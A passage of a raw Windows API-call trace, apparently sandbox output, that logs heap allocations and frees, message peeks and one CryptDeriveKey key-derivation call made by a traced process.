hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.081] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0257.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.082] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.082] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.082] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.082] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0257.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa370, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0257.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.086] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.086] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5960, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0257.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.091] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.093] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.094] RtlAllocateHeap 